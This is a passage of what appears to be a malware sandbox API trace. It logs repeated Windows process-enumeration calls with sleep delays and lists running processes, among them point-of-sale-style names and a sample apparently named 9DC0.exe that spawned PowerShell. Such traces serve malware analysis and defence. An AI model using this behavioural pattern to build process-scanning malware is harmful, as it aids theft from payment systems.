cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.907] Sleep (dwMilliseconds=0x64) [0253.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0253.931] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.007] Sleep (dwMilliseconds=0x64) [0254.018] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0254.029] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.111] Sleep (dwMilliseconds=0x64) [0254.149] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0254.162] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.329] Sleep (dwMilliseconds=0x64) [0254.371] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0254.427] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.579] Sleep (dwMilliseconds=0x64) [0254.618] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0254.633] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.785] Sleep (dwMilliseconds=0x64) [0254.831] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0254.849] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.963] Sleep (dwMilliseconds=0x64) [0255.017] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0255.028] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.180] Sleep (dwMilliseconds=0x64) [0255.241] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0255.253] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.404] Sleep (dwMilliseconds=0x64) [0255.441] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0255.490] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.640] Sleep (dwMilliseconds=0x64) [0255.676] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0255.688] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.842] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0255.845] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0255.846] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0255.848] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0255.850] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0255.852] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0255.853] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0255.855] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0255.857] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0255.858] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0255.860] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0255.862] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0255.863] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0255.865] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0255.867] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0255.868] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0255.870] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0255.871] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0255.873] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0255.874] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0255.916] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0255.918] CloseHandle (hObject=0x2338) returned 1 [0255.918] Sleep (dwMilliseconds=0x64) [0255.955] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0255.970] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.972] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0255.973] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0255.975] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.977] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0255.978] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.980] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0255.981] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0255.983] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0255.984] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.986] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.988] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0256.042] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.043] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.045] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.047] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.049] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.051] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.052] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.054] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0256.056] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0256.057] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.094] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0256.096] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.097] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0256.099] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0256.100] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0256.102] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0256.103] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0256.105] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0256.106] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.108] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.109] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0256.179] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.180] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0256.182] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.184] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0256.185] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0256.187] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0256.188] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0256.190] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0256.191] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0256.193] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0256.195] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0256.196] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0256.198] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0256.221] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, 